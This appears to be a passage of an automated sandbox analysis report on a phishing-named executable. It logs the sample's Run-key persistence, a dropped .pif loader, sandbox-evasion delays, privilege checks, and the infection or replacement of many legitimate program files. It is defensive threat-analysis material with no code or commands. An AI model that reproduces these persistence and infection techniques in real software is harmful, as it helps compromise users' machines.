                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Sdvvfamy

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\TieringEngineService.exe | File created: C:\System Volume Information\Heat\
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B2AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02B2AB1C
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Memory allocated: 2B10000 memory commit 500006912
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Memory allocated: 2B11000 memory commit 500178944
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Memory allocated: 2B3D000 memory commit 500002816
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Memory allocated: 2B3E000 memory commit 500350976
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Memory allocated: 2B94000 memory commit 501014528
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Memory allocated: 2C8C000 memory commit 500006912
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Memory allocated: 2C8E000 memory commit 500015104
                  Source: C:\Windows\System32\alg.exe | Code function: 12_2_004A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_004A52A0
                  Source: C:\Windows\System32\AppVClient.exe | Code function: 17_2_00B852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 17_2_00B852A0
                  Source: C:\Windows\System32\FXSSVC.exe | Code function: 24_2_004F52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 24_2_004F52A0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 25_2_008952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_008952A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 26_2_00D252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 26_2_00D252A0
                  Source: C:\Windows\System32\msdtc.exe | Code function: 27_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 27_2_00CD52A0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 28_2_007552A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 28_2_007552A0
                  Source: C:\Windows\System32\Locator.exe | Code function: 30_2_005452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 30_2_005452A0
                  Source: C:\Windows\System32\SensorDataService.exe | Code function: 31_2_007352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 31_2_007352A0
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Memory allocated: 26C50000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Memory allocated: 26E30000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Memory allocated: 28E30000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_1_004019F0
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Window / User API: threadDelayed 7315
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Window / User API: threadDelayed 2503
                  Source: C:\Windows\System32\msdtc.exe | Window / User API: threadDelayed 491
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_9-12900)
Source: C:\Windows\System32\SensorDataService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\alg.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_12-5854)
Source: C:\Windows\System32\msdtc.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_17-5698)
Source: C:\Windows\System32\Locator.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
